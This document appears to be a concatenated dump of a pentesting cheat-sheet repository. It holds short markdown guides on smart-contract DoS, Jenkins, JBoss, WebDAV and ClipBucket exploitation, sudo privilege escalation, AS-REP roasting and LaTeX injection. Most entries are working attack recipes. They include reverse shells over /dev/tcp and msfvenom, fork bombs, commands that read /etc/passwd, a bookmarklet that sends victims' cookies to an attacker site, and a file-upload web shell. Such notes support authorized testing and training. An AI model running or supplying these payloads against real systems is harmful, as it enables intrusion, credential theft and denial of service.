Solidity execution by consuming all gas using various ways. 4 | 5 | ## DoS with Assembly Invalid Function 6 | 7 | The `invalid()` opcode in in-line assembly consumes all the gas and causes Dos for the contract. 8 | 9 | ```js 10 | // SPDX-License-Identifier: MIT 11 | pragma solidity ^0.8.0; 12 | 13 | contract Victim { 14 | address public owner; 15 | uint public balance; 16 | 17 | function withdrawUser(address _address) { 18 | (bool success, ) = _address.call{value: balance}(""); 19 | // Some code ... 20 | } 21 | } 22 | 23 | contract Attack { 24 | Victim target; 25 | 26 | constructor(address _targetAddress) { 27 | target = Victim(_targetAddress); 28 | target.withdrawUser(address(this)); 29 | } 30 | 31 | fallback() payable external { 32 | assembly { 33 | invalid() 34 | } 35 | } 36 | } 37 | ``` 38 | -------------------------------------------------------------------------------- /docs/exploit/blockchain/smart-contract/index.md: -------------------------------------------------------------------------------- 1 | # Smart Contract Attack Methodology 2 | 3 | When attacking target contract, we can create an attack contract which loads the target contract and abuse it. 4 | 5 | ## Create an Attack Contract 6 | 7 | ```js 8 | // SPDX-License-Identifier: MIT 9 | pragma solidity ^0.8.0; 10 | 11 | // Define interface for victim contract 12 | interface IVictim { 13 | // Set the Victim contract functions 14 | function example1() external; 15 | function example2(uint) external; 16 | } 17 | 18 | // Define Attack contract to compromise the victim contract 19 | contract Attack { 20 | IVictim public victim; 21 | 22 | constructor(address _victimAddress) { 23 | // Initialize Victim contract (interface) 24 | victim = IVictim(_victimAddress); 25 | } 26 | 27 | // Create a function to be used for attacking the victim contract 28 | function attack() public { 29 | victim.example1(); 30 | victim.example2(1); 31 | } 32 | } 33 | ``` -------------------------------------------------------------------------------- /docs/exploit/printer/raw-printing.md: -------------------------------------------------------------------------------- 1 | # Raw Printing Pentesting 2 | 3 | PLJ (Printer Job Languages) is a method for switching printer languages. A default port is 9100. 4 | 5 | ## Enumeration 6 | 7 | ```sh 8 | nmap --script pjl-ready-message -p 9100 9 | ``` 10 | 11 | ## Connect 12 | 13 | ```bash 14 | nc 9100 15 | ``` 16 | 17 | ## Commands 18 | 19 | ```bash 20 | # See printer information 21 | @PJL INFO STATUS 22 | @PJL INFO ID 23 | @PJL INFO PRODINFO 24 | 25 | # See directories in the system 26 | @PJL FSDIRLIST NAME="0:" ENTRY=1 27 | @PJL FSDIRLIST NAME="0:/../" ENTRY=1 28 | @PJL FSDIRLIST NAME="0:/../etc/" ENTRY=1 29 | @PJL FSDIRLIST NAME="0:/../home/" ENTRY=1 30 | 31 | # See contents of a file 32 | @PJL FSUPLOAD NAME="0:/../etc/passwd" ENTRY=1 33 | ``` 34 | 35 | ## References 36 | 37 | - [hp](https://developers.hp.com/system/files/PJL_Technical_Reference_Manual.pdf) 38 | - [HackTricks](https://book.hacktricks.xyz/network-services-pentesting/9100-pjl) -------------------------------------------------------------------------------- /docs/exploit/web/jenkins.md: -------------------------------------------------------------------------------- 1 | # Jenkins Pentesting 2 | 3 | Jenkins is an automation server which helps automate the parts of software development related to building, testing, and deploying, etc. 4 | 5 | ## Brute Force Credentials 6 | 7 | ```sh 8 | msfconsole 9 | msf > use auxiliary/scanner/http/jenkins_login 10 | ``` 11 | 12 | ## Reverse Shell on Dashboard 13 | 14 | You need to have the credential. 15 | 16 | 1. **Opening Listener on Your Local Machine** 17 | 18 | ```sh 19 | nc -lvnp 4444 20 | ``` 21 | 22 | 2. **Login to Jenkins** 23 | 24 | Access "http://localhost:8080" in browser and login. 25 | 26 | 3. **Click "Manage Jenkins" -> "Script Console"** 27 | 28 | 4. **Add the Payload in the Console** 29 | 30 | ```java 31 | r = Runtime.getRuntime() 32 | p = r.exec(["/bin/bash", "-c", "exec 5<>/dev/tcp//4444; cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) 33 | p.waitFor() 34 | ``` 35 | 36 | 5. **Click "Run"** 37 | 38 | Then you should get a shell. -------------------------------------------------------------------------------- /docs/exploit/linux/forkbomb.md: -------------------------------------------------------------------------------- 1 | # Fork Bomb 2 | 3 | Fork Bomb is one of the denial-of-service attacks which lead the system to deplete the available resources by replicating a child process infinitely. 4 | 5 | ### Warning 6 | 7 | **Please don’t execute the following programs in system that you don’t want to harm.** 8 | 9 | ## Exploitation in C 10 | 11 | This program forks child processes continuously. 12 | 13 | ```c 14 | #include 15 | #include 16 | 17 | int main() 18 | { 19 | while (1) 20 | // Create a child process from the parent process. 21 | fork(); 22 | return 0; 23 | } 24 | ``` 25 | 26 | ## Exploitation in Python 27 | 28 | ```python 29 | import os 30 | 31 | while True: 32 | os.fork() 33 | ``` 34 | 35 | ## Exploitation in Bash 36 | 37 | ```bash 38 | :(){ :|: & };: 39 | ``` 40 | 41 | ## References 42 | 43 | - [GeeksForGeeks](https://www.geeksforgeeks.org/zombie-processes-prevention/?ref=ml_lbp) 44 | - [Imperva](https://www.imperva.com/learn/ddos/fork-bomb/) 45 | -------------------------------------------------------------------------------- /docs/exploit/linux/privilege-escalation/sudo/path-traversal.md: -------------------------------------------------------------------------------- 1 | # Sudo Path Traversal Privilege Escalation 2 | 3 | If some `sudo` command receives a file path, we might escalate to privileges using path traversal. 4 | 5 | ## Investigation 6 | 7 | ```sh 8 | sudo -l 9 | 10 | (ALL) /usr/bin/node /usr/local/scripts/*.js 11 | ``` 12 | 13 | If the file path uses wildcards, we may execute arbitrary files. 14 | In short, we can refer to files in different directories which the system owner unintended. 15 | 16 |
17 | 18 | ## Exploitation 19 | 20 | Assume we can execute ‘node’ command as root and js file. 21 | Create the **“test.js”** under **/tmp**, which spawns a root shell after executing **‘node’** command. 22 | 23 | ```jsx 24 | // /tmp/test.js 25 | require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]}) 26 | ``` 27 | 28 | Now run **‘node’** command as root. We can pass the file using path traversal. 29 | 30 | ```jsx 31 | sudo /usr/bin/node /usr/local/scripts/../../../tmp/test.js 32 | ``` -------------------------------------------------------------------------------- /docs/exploit/windows/forensics/onedrive-logs.md: -------------------------------------------------------------------------------- 1 | # OneDrive Logs 2 | 3 | OneDrive log files can be read by deobfuscating. 4 | 5 | ## Deobfuscating Log Files 6 | 7 | To read OneDrive logs, we need to deobfuscate log files (**`.odl`, `.odlsent`, `.odlgz`**). 8 | These logs are located in the following on **Windows**: 9 | 10 | - `C:\Users\\AppData\Local\Microsoft\OneDrive\logs\Personal\` 11 | - `C:\Users\\AppData\Local\Microsoft\OneDrive\logs\Business1\` 12 | 13 | [This repository](https://github.com/ydkhatri/OneDrive) is useful to deobfuscate OneDrive logs. 14 | 15 | ```bash 16 | python -m venv venv 17 | # on Windows 18 | .\venv\Scripts\activate 19 | pip install construct pycryptodome 20 | python odl.py -o .\output.csv c:\Users\\AppData\Local\Microsoft\OneDrive\logs\Personal\ 21 | ``` 22 | 23 | After that, we can read the output file (`output.csv`) with tools such as VS Code and Excel. 24 | This file contains sensitive information such as OneDrive account email, access token, etc. -------------------------------------------------------------------------------- /docs/exploit/machine-learning/orange-data-mining.md: -------------------------------------------------------------------------------- 1 | # Orange Data Mining 2 | 3 | Orange is a data-mining and machine learning software that allows users to analyze data, create visualizations, and build predictive models. 4 | 5 | ## Installation & Start 6 | 7 | To install Orange, we can install it with pip in Linux. 8 | 9 | ```bash 10 | pip install PyQt5 PyQtWebEngine 11 | pip install orange3 12 | ``` 13 | 14 | ## Basic Usage 15 | 16 | ### 1. Start Orange Software 17 | 18 | ```bash 19 | python -m Orange.canvas 20 | ``` 21 | 22 | ### 2. Open .OWS File 23 | 24 | When the Orange starts, open the “.ows” file. 25 | 26 | ### 3. Import Data File 27 | 28 | Add the File widget in the left pane, and import data file such as “.csv”. 29 | 30 | ### 4. Workflows 31 | 32 | Connect the File widget with the Scatter Plot widget and open the Scatter Plot. We can see the data with plot. 33 | 34 | ## References 35 | 36 | - [Orange](https://orange3.readthedocs.io/projects/orange-visual-programming/en/latest/index.html) -------------------------------------------------------------------------------- /docs/exploit/web/framework/django.md: -------------------------------------------------------------------------------- 1 | # Django Pentesting 2 | 3 | Django is a web framework in Python. 4 | 5 | ## SSTI (Server-Side Template Injection) 6 | 7 | ```bash 8 | # XSS 9 | {{ `` }} 10 | 11 | # Debug information 12 | {% debug %} 13 | ``` 14 | 15 | ## Bypass ALLOWED_HOSTS 16 | 17 | If we get the error **“Invalid HTTP_HOST header: 'x.x.x.x:8000'. You may need to add 'x.x.x.x' to ALLOWED_HOSTS"** when accessing the website written in Django, you need to intercept the value of the Host in the HTTP request header. 18 | Then you should be able to access the website. 19 | 20 | ```bash 21 | Host: 0.0.0.0:8000 22 | # or 23 | Host: 127.0.0.1:8000 24 | ``` 25 | 26 | Or if we can have the permission to edit the configuration of the website, add new IP address to **ALLOWED_HOSTS** in **`settings.py`**. 27 | 28 | ```bash 29 | ALLOWED_HOSTS = ['0.0.0.0', '127.0.0.1', 'x.x.x.x'] 30 | ``` 31 | 32 | ## Create a New User 33 | 34 | ```bash 35 | python3 manage.py createsuperuser 36 | ``` -------------------------------------------------------------------------------- /docs/exploit/web/tool/add-custom-http-headers.md: -------------------------------------------------------------------------------- 1 | # Add Custom HTTP Headers in Burp Suite 2 | 3 | In Burp Suite, we can add custom header by setting up options. 4 | 5 | ## Add Custom HTTP Headers 6 | 7 | In some cases such as bug bounty programs, it may be convenient to set custom HTTP headers in advance. 8 | 9 | 1. Go to **Proxy -> Options** tab. 10 | 2. Scroll down to **"Match and Replace"**. 11 | 3. Click on **"Add"**. 12 | 4. Set rule: 13 | 14 | - **User Agent** 15 | 16 | ```txt 17 | Type: Request header 18 | Match: ^User-Agent.*$ 19 | Replace: User-Agent: HackerOne-username 20 | Comment: 21 | ``` 22 | 23 | - **New Original Header** 24 | 25 | ```txt 26 | Type: Request header 27 | Match: (empty) 28 | Replace: X-Bug-Bounty: HackerOne-username 29 | Comment: 30 | ``` 31 | 32 | 5. Check the box of **"Regex match"**. 33 | 6. Click on **"OK"**. 34 | 7. Search for the rule in the list and click on **"Enabled"**. -------------------------------------------------------------------------------- /docs/exploit/linux/privilege-escalation/sudo/java.md: -------------------------------------------------------------------------------- 1 | # Sudo Java Privilege Escalation 2 | 3 | The `sudo java` command might be vulnerable to privilege escalation. 4 | 5 | ## Investigation 6 | 7 | ```bash 8 | sudo -l 9 | 10 | (root) /usr/bin/java -jar *.jar 11 | ``` 12 | 13 | If we can execute java command with arbitrary **`.jar`** file as root, we can escalate to privileges. 14 | 15 | ## Exploitation 16 | 17 | ### 1. Create a JAR File 18 | 19 | First, create a custom jar file in local machine. 20 | Replace **``** with your local ip address. 21 | 22 | ```bash 23 | msfvenom -p java/shell_reverse_tcp LHOST= LPORT=4444 -f jar -o shell.jar 24 | ``` 25 | 26 | Then transfer the file to remote machine. 27 | 28 | ### 2. Reverse Shell 29 | 30 | In local machine, start a listener. 31 | 32 | ```bash 33 | nc -lvnp 4444 34 | ``` 35 | 36 | Now execute the java command as root in target machine. 37 | 38 | ```bash 39 | sudo /usr/bin/java -jar /tmp/shell.jar 40 | ``` 41 | 42 | We should get a root shell. -------------------------------------------------------------------------------- /docs/exploit/web/framework/ajp.md: -------------------------------------------------------------------------------- 1 | # AJP (Apache JServ Protocol) Pentesting 2 | 3 | AJP is a binary protocol that can proxy inbound requests from a web server through to an application server that sits behind the web server. A default port is 8009. 4 | 5 | ## Enumeration 6 | 7 | ```sh 8 | nmap --script ajp-auth -p 8009 9 | nmap --script ajp-auth --script-args ajp-auth.path=/login -p 8009 10 | nmap --script ajp-brute -p 8009 11 | nmap --script ajp-headers -p 8009 12 | nmap --script ajp-methods -p 8009 13 | nmap --script ajp-request -p 8009 14 | ``` 15 | 16 | ## Ghostcat File Inclusion 17 | 18 | It's a vulnerability of **Tomcat AJP** ([CVE-2020-1938](https://www.exploit-db.com/exploits/49039)). 19 | Use Metasploit for exploiting it. 20 | 21 | ```sh 22 | msfconsole 23 | msf6 > use auxiliary/admin/http/tomcat_ghostcat 24 | msf6 auxiliary(admin/http/tomcat_ghostcat) > set rhosts 25 | msf6 auxiliary(admin/http/tomcat_ghostcat) > exploit 26 | ``` -------------------------------------------------------------------------------- /docs/exploit/cryptography/algorithm/kdbx-files.md: -------------------------------------------------------------------------------- 1 | # KDBX Files 2 | 3 | A KDBX file is a password database created by KeePass Password Safe. 4 | 5 | ## Open KDBX File 6 | 7 | If KeePass software does not exist in our system, run the following command. 8 | 9 | ```bash 10 | sudo apt install keepassx 11 | # or 12 | sudo apt install keepass2 13 | ``` 14 | 15 | To open **KeePass*, run the following command. 16 | 17 | ```sh 18 | keepassx 19 | # or 20 | keepass2 21 | ``` 22 | 23 | ### Copy Password 24 | 25 | Right-click on the password value then click **Copy Password**. 26 | 27 | ## Crack KDBX Password 28 | 29 | When opening KDBX file in KeePass if you’re asked the Master Key, you need to crack the password of the KDBX file. **John The Ripper** can be used to crack the password. 30 | 31 | ### 1. Convert to Hash 32 | 33 | ```sh 34 | keepass2john example.kdbx > hash.txt 35 | ``` 36 | 37 | ### 2. Crack the Hash 38 | 39 | ```sh 40 | john --wordlist=wordlist.txt hash.txt 41 | # or 42 | hashcat -m 13400 -a 0 hash.txt wordlist.txt 43 | ``` -------------------------------------------------------------------------------- /docs/exploit/linux/privilege-escalation/sudo/shutdown-poweroff.md: -------------------------------------------------------------------------------- 1 | # Sudo Shutdown, Poweroff Privilege Escalation 2 | 3 | The `sudo shutdown` command might be vulnerable to privilege escalation (PrivEsc). 4 | 5 | ## Investigation 6 | 7 | ```sh 8 | sudo -l 9 | 10 | (ALL) NOPASS: /usr/sbin/shutdown 11 | ``` 12 | 13 | If we can execute **"shutdown"** command as root, we can gain access to privileges by overwriting the path of **"poweroff"**. 14 | 15 | ## Exploitation 16 | 17 | First create **/tmp/poweroff** binary which invoke a shell. 18 | 19 | ```sh 20 | echo /bin/sh > /tmp/poweroff 21 | # or 22 | echo /bin/bash > /tmp/poweroff 23 | ``` 24 | 25 | Then change permissions of the file and add **"/tmp"** folder to **PATH**. 26 | 27 | ```sh 28 | chmod +x /tmp/poweroff 29 | export PATH=/tmp:$PATH 30 | ``` 31 | 32 | Now execute **"shutdown"** as root. 33 | 34 | ```sh 35 | # Some SUID command 36 | sudo /usr/sbin/shutdown 37 | 38 | # Then you are root user 39 | root> 40 | ``` 41 | 42 | **/tmp/poweroff** is executed and spawn a root shell. 43 | -------------------------------------------------------------------------------- /docs/exploit/linux/privilege-escalation/sudo/fail2ban-command.md: -------------------------------------------------------------------------------- 1 | # Sudo Fail2ban-Client Privilege Escalation 2 | 3 | The `sudo fail2ban-client` command might be vulnerable to privilege escalation (PrivEsc). 4 | 5 | ## Investigation 6 | 7 | ```bash 8 | sudo -l 9 | 10 | # Output: 11 | (ALL) NOPASSWD: /usr/bin/fail2ban-client 12 | ``` 13 | 14 | If we can execute `fail2ban-client` command as root, we may be able to escalate privilege and gain a root shell. 15 | 16 | ## Exploit 17 | 18 | ```bash 19 | # Get jail list 20 | sudo /usr/bin/fail2ban-client status 21 | # Choose one of the jails from the "Jail list" in the output. 22 | sudo /usr/bin/fail2ban-client get actions 23 | # Create a new action with arbitrary name (e.g. "evil") 24 | sudo /usr/bin/fail2ban-client set addaction evil 25 | # Set payload to actionban 26 | sudo /usr/bin/fail2ban-client set action evil actionban "chmod +s /bin/bash" 27 | # Trigger the action 28 | sudo /usr/bin/fail2ban-client set banip 1.2.3.5 29 | # Now we gain a root 30 | /bin/bash -p 31 | ``` -------------------------------------------------------------------------------- /docs/exploit/web/jboss.md: -------------------------------------------------------------------------------- 1 | # JBOSS Pentesting 2 | 3 | JBOSS AS (Application Server), also known as WildFly, is an application server which is written in Java. 4 | 5 | ## Enumeration 6 | 7 | ```sh 8 | msfconsole 9 | msf > use auxiliary/scanner/http/jboss_vulnscan 10 | ``` 11 | 12 | ## Common Directories 13 | 14 | ```txt 15 | /admin-console/ 16 | /invoker/JMXInvokerServlet 17 | /jbossws/ 18 | /jmx-console/ 19 | /jmx-console/HtmlAdaptor 20 | /management 21 | /manager 22 | /status?full=true 23 | /web-console/ 24 | /web-console/Invoker 25 | /web-console/ServerInfo.jsp 26 | ``` 27 | 28 | ## Default Credentials 29 | 30 | ```txt 31 | admin:admin 32 | ``` 33 | 34 | ## Exploitation 35 | 36 | [JexBoss](https://github.com/joaomatosf/jexboss) is available as an exploitation CLI tool. 37 | 38 | ```bash 39 | git clone https://github.com/joaomatosf/jexboss.git 40 | cd jexboss 41 | pip3 install -r requirements.txt 42 | python3 jexboss.py -host https://example.com:8080 43 | 44 | # Reverse Shell 45 | Shell> /bin/bash -i > /dev/tcp/10.0.0.1/4444 0>&1 2>&1 46 | ``` -------------------------------------------------------------------------------- /docs/exploit/web/webdav.md: -------------------------------------------------------------------------------- 1 | # WebDAV Pentesting 2 | 3 | WebDAV is a set of extensions to the Hypertext Transfer Protocol, which allows user agents to collaboratively author contents directly in an HTTP web server. 4 | 5 | ## Enumeration 6 | 7 | ```sh 8 | msfconsole 9 | msf> use auxiliary/scanner/http/webdav_scanner 10 | ``` 11 | 12 | ## Default Credentials 13 | 14 | ```sh 15 | wampp:xampp 16 | ``` 17 | 18 | ## Reverse Shell 19 | 20 | ### 1. Check if the exploit can be uploaded 21 | 22 | ```sh 23 | davtest -url http://example.com/davdir -auth 'user:pass' 24 | ``` 25 | 26 | ### 2. Upload the Reverse Shell Script 27 | 28 | If we can upload the file e.g. PHP file, upload the script for reverse shell. 29 | 30 | ```sh 31 | davtest -url http://example.com/davdir -auth 'user:pass' -uploadfile shell.php -uploadloc shell.php 32 | ``` 33 | 34 | ### 3. Get a Shell 35 | 36 | In local machine, start listener for getting a shell. 37 | 38 | ```sh 39 | nc -lvnp 4444 40 | ``` 41 | 42 | Now access to http://example.com/davdir/shell.php. 43 | We should get a shell. -------------------------------------------------------------------------------- /docs/exploit/web/bookmarklet.md: -------------------------------------------------------------------------------- 1 | # Bookmarklet Attack 2 | 3 | If attackers can inject arbitrary JavaScript code in target website, they can induce victims to malicious executions with bookmarklet. 4 | 5 | ## Exploitation 6 | 7 | ### Malicious Links 8 | 9 | Attackers induce victims to add their malicious link into the bookmark menu as below. 10 | 11 | ```html 12 |

Drag and drop the following link into the bookmark menu to access easily!

13 | Example.com 14 | ``` 15 | 16 | In addition, if the current website does not set **`HttpOnly`** flag on the **`Set-Cookie`** response header, attackers can get the victim's cookie and send it to the malicious website as below. 17 | 18 | ```html 19 |

Drag and drop me the following link into the bookmark menu to access easily!

20 | Example.com 21 | ``` 22 | 23 | ## References 24 | 25 | - [SOCRadar](https://socradar.io/csp-bypass-unveiled-the-hidden-threat-of-bookmarklets/) -------------------------------------------------------------------------------- /docs/exploit/windows/active-directory/asrep-roasting.md: -------------------------------------------------------------------------------- 1 | # AS-REP Roasting 2 | 3 | AS-REP Roasting is a technique that retrieves password hashes that are not required Kerberos preauth in Active Directory. 4 | 5 | ## Exploit 6 | 7 | Lists users and passwords is not required Kerberos pre auth. Used for ASREPRoasting. 8 | 9 | ```sh 10 | impacket-GetNPUsers example.local/ 11 | impacket-GetNPUsers -dc-ip example.local/ -no-pass -usersfile users.txt 12 | impacket-GetNPUsers -dc-ip example.local/ -no-pass -format hashcat 13 | 14 | # Without authenticatino 15 | netexec ldap -u users.txt -p '' --asreproast output.txt 16 | # With authentication 17 | netexec ldap -u username -p password --asreproast output.txt 18 | # With Kerberos authentication (-k) 19 | netexec ldap -k --asreproast output.txt 20 | ``` 21 | 22 | If we find a password hash, crack it. 23 | 24 | ```sh 25 | john --format=krb5asrep --wordlist=wordlist.txt hash.txt 26 | # or 27 | hashcat -m 18200 -a 0 hash.txt wordlist.txt 28 | ``` 29 | -------------------------------------------------------------------------------- /docs/exploit/blockchain/smart-contract/solidity-assembly.md: -------------------------------------------------------------------------------- 1 | # Solidity Assembly 2 | 3 | ## Simple Example 4 | 5 | ```js 6 | pragma solidity ^0.8.0; 7 | 8 | contract Simple { 9 | constructor(address _addr) { 10 | assembly { 11 | // Get the size of the code 12 | let size := extcodesize(_addr); 13 | // Allocate output byte array 14 | code := mload(0x40); 15 | // New "memory end" including padding 16 | mstore(0x40, add(code, and(add(add(size, 0x20), 0x1f), not(0x1f)))); 17 | // Store length in memory 18 | mstore(code, size); 19 | // Retrieve the code 20 | extcodecopy(addr, add(code, 0x20), 0, size); 21 | } 22 | } 23 | } 24 | ``` 25 | 26 | ## From Opcode 27 | 28 | ```js 29 | pragma solidity ^0.8.0; 30 | 31 | contract Opcode { 32 | constructor() { 33 | address myContract; 34 | bytes memory opcode = "\x60\x0a\x60\x0c\x60\x00\x39\x60\x0a\x60\x00\xf3\x60\x2a\x60\x80\x52\x60\x20\x60\x80\xf3"; 35 | 36 | assembly { 37 | myContract := create(0, add(opcode, 0x20), mload(opcode)) 38 | } 39 | 40 | // Some code here... 41 | } 42 | } 43 | ``` -------------------------------------------------------------------------------- /docs/exploit/cryptography/math/quadratic-residue.md: -------------------------------------------------------------------------------- 1 | # Quadratic Residue 2 | 3 | ## Basic 4 | 5 | An integer **`x`** is called a quadratic residue modulo **`p`**. 6 | 7 | ```python 8 | a**2 = x mod p 9 | ``` 10 | 11 | ### Brute Force 12 | 13 | To calculate a quadratic residue, the following Python script is an example for that. 14 | 15 | ```python 16 | p = 71 17 | 18 | for a in range(p): 19 | qr = (pow(a, 2, p)) 20 | print(f"a={a} : qr={qr}") 21 | ``` 22 | 23 | ### Legendre Symbol 24 | 25 | According to Legendre Symbol, the following rules hold: 26 | 27 | ```python 28 | # `a` is a quadratic residue and `a != 0 mod p` 29 | a**(p-1)/2 mod p == 1 30 | 31 | # `a` is a quadratic non-residue mod p 32 | a**(p-1)/2 mod p == -1 33 | 34 | # `a ≡ 0 mod p` 35 | a**(p-1)/2 mod p == 0 36 | ``` 37 | 38 | We can check if an integer is a quadratic residue or not referring to the above. 39 | 40 | ```python 41 | print(pow(a, (p-1)//2, p) == 1) 42 | # If True, `a` is a quadratic resudiue. 43 | ``` 44 | 45 | ## References 46 | 47 | - [CryptoHack](https://cryptohack.org/courses/modular/root1/) 48 | -------------------------------------------------------------------------------- /docs/exploit/web/session-fixation.md: -------------------------------------------------------------------------------- 1 | # Session Fixation 2 | 3 | Session fixation attacks attempt to exploit the vulnerability of a system that allows one person to fixate another person’s session identifier. 4 | 5 | ## Exploitation 6 | 7 | ### 1. Attacker Logins Website to Get the Session 8 | 9 | An attacker need to login to a legitimate website then get the session value. 10 | 11 | ```bash 12 | Cookie: sessid=abcdef 13 | ``` 14 | 15 | ### 2. Attacker Sends the Session Value to Victim 16 | 17 | There are various way to send the attacker’s session value. For example, 18 | 19 | - Send email. 20 | - Predict a session value. 21 | - Eavesdrop a session using packet sniffer such as Wireshark. 22 | - XSS 23 | 24 | ```bash 25 | 26 | ``` 27 | 28 | ### 3. Victim Logins with Attacker’s Session 29 | 30 | If the victim logins and attacker’s session is set to the Cookie, the attacker can control the victim’s account in the website. 31 | 32 | ## References 33 | 34 | - [OWASP](https://owasp.org/www-community/attacks/Session_fixation) 35 | -------------------------------------------------------------------------------- /docs/exploit/cloud/gcp.md: -------------------------------------------------------------------------------- 1 | # GCP (Google Cloud Platform) Pentesting 2 | 3 | ## Install Google Cloud CLI 4 | 5 | Before pentesting GCP, we need to install a dedicated CLI tool. See [the installation guide](https://cloud.google.com/sdk/docs/install) for details. 6 | After installed, login with your Google credential: 7 | 8 | ```bash 9 | gcloud auth login 10 | ``` 11 | 12 |
13 | 14 | ## Google Storage 15 | 16 | Google Storage allows users to store static files in the URL: `https://storage.googleapis.com//`. 17 | We can enumerate the target storage as below: 18 | 19 | ```bash 20 | # Enumerate accessible directories/files from outside. 21 | fuzz -u https://storage.googleapis.com//FUZZ -w wordlist.txt -fc 403 22 | 23 | # Display directories/files 24 | gsutil ls gs:///example/ 25 | 26 | # Download a file 27 | gsutil cp gs:///example.txt 28 | 29 | # Get information for the bucket 30 | gsutil stat gs:///index.html 31 | ``` 32 | 33 | ## References 34 | 35 | - [PwnedLabs](https://pwnedlabs.io/labs/reveal-hidden-files-in-google-storage) 36 | -------------------------------------------------------------------------------- /docs/exploit/web/idor-attack.md: -------------------------------------------------------------------------------- 1 | # IDOR (Insecure Direct Object References) Attack 2 | 3 | IDOR is a type of access control vulnerability in web applications. 4 | 5 | ## Find Vulnerabilities from HTML Source Code 6 | 7 | First check values of attributes on input elements. 8 | 9 | ```html 10 | 11 | ``` 12 | 13 | Then try what will happen when you change the Cookie value in a HTTP header. 14 | 15 | ```txt 16 | Cookie: user_id=12 17 | ``` 18 | 19 | ## Change GET Parameters 20 | 21 | ### Manual 22 | 23 | ```sh 24 | /user?id=1 25 | /user?id=2 26 | /user?id=-1 27 | /user?id=00 28 | 29 | /admin/posts/1 30 | /admin/posts/-1 31 | /admin/posts/00 32 | 33 | /static/1.txt 34 | /static/2.txt 35 | /static/-1.txt 36 | /static/00.txt 37 | ``` 38 | 39 | ### Automation 40 | 41 | ```sh 42 | seq 0 100 | ffuf -u https://example.com/user?id=FUZZ -w - 43 | 44 | wfuzz -z file,./numbers.txt https://example.com/user?id=FUZZ 45 | ``` 46 | 47 | ## Change POST Parameters 48 | 49 | ```bash 50 | address=1&user_id=1 51 | address=1&user_id=2 52 | 53 | # URL Encode '&' 54 | address=1%26user_id=2 55 | ``` -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | Copyright (c) 2022 hdks 2 | 3 | Permission is hereby granted, free of charge, to any person obtaining 4 | a copy of this software and associated documentation files (the 5 | "Software"), to deal in the Software without restriction, including 6 | without limitation the rights to use, copy, modify, merge, publish, 7 | distribute, sublicense, and/or sell copies of the Software, and to 8 | permit persons to whom the Software is furnished to do so, subject to 9 | the following conditions: 10 | 11 | The above copyright notice and this permission notice shall be 12 | included in all copies or substantial portions of the Software. 13 | 14 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, 15 | EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF 16 | MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND 17 | NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE 18 | LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION 19 | OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION 20 | WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. 21 | -------------------------------------------------------------------------------- /docs/exploit/web/clipbucket.md: -------------------------------------------------------------------------------- 1 | # ClipBucket Pentesting 2 | 3 | ClipBucket is a freely downloadable PHP script that will let you start your own Video Sharing website (YouTube Clone). 4 | 5 | ## Arbitrary File Upload < v4.0.0 6 | 7 | ClipBucket versions before 4.0.0 is vulnerable to file upload in ‘uploader’ actions. We can upload arbitrary files so we can execute reverse shell. 8 | 9 | ### 1. Prepare Payload 10 | 11 | Create a PHP script to reverse shell in local machine. 12 | 13 | ```bash 14 | cp /usr/share/webshells/php/php-reverse-shell.php ./shell.php 15 | ``` 16 | 17 | Update $ip and $port with your local ip address and port. 18 | 19 | ### 2. Upload the Payload 20 | 21 | Next upload the above PHP script to the target website. 22 | 23 | ```bash 24 | curl -F "file=@shell.php" -F "plupload=1" -F "name=shell.php" "https://example.com/actions/beats_uploader.php" 25 | ``` 26 | 27 | ### 3. Reverse Shell 28 | 29 | In local machine, start a listener. 30 | 31 | ```bash 32 | nc -lvnp 4444 33 | ``` 34 | 35 | Then access to **`https://example.com/actions/CB_BEATS_UPLOAD_DIR/.php`**. 36 | We should get a shell. -------------------------------------------------------------------------------- /docs/exploit/windows/privilege-escalation/manageengine-adselfservice-plus.md: -------------------------------------------------------------------------------- 1 | # ManageEngine ADSelfService Plus PrivEsc 2 | 3 | ADSelfService Plus is an integrated Active Directory Self-Service Password Management and Single Sign-on Solution that reduces password-related help desk calls. Default ports are 8888 (http) and 9251 (https). 4 | 5 | ## Directories 6 | 7 | ```bash 8 | dir -Force \Program Files (x86)\ManageEngine\ADSelfService Plus\ 9 | ``` 10 | 11 | ## Unauthenticated SAML RCE (CVE-2022-47966) 12 | 13 | Reference: [https://www.rapid7.com/db/modules/exploit/multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966/](https://www.rapid7.com/db/modules/exploit/multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966/) 14 | 15 | ```bash 16 | msfconsole 17 | msf> use exploit/multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966 18 | msf> set GUID 43ae36f51da65753530a64b37a510a53 19 | msf> set ISSUER_URL http://example.com/adfs/services/trust 20 | msf> set RHOSTS 21 | msf> set RPORT 9251 22 | msf> set LHOST 23 | msf> set LPORT 4444 24 | msf> run 25 | meterpreter> shell 26 | ``` -------------------------------------------------------------------------------- /docs/exploit/web/latex-injection.md: -------------------------------------------------------------------------------- 1 | # LaTeX Injection 2 | 3 | LaTeX is a software system for document preparation. It may be vulnerable to arbitrary command injection or path traversal. 4 | 5 | ## Payloads - Read Files 6 | 7 | ```bash 8 | # Read file 9 | \input{/etc/passwd} 10 | $\input{/etc/passwd}$ 11 | $$\input{/etc/passwd}$$ 12 | 13 | \include{example} # Read example.tex 14 | $\include{example}$ 15 | $$\include{example}$$ 16 | 17 | \lstinputlisting{/etc/passwd} 18 | $\lstinputlisting{/etc/passwd}$ 19 | $$\lstinputlisting{/etc/passwd}$$ 20 | ``` 21 | 22 | ## Payloads - Write File 23 | 24 | ```bash 25 | \newwrite\outfile 26 | $\newwrite\outfile$ 27 | $$\newwrite\outfile$$ 28 | 29 | \openout\outfile=cmd.tex 30 | $\openout\outfile=cmd.tex$ 31 | $$\openout\outfile=cmd.tex$$ 32 | 33 | \write\outfile{Hello-World} 34 | $\write\outfile{Hello-World}$ 35 | 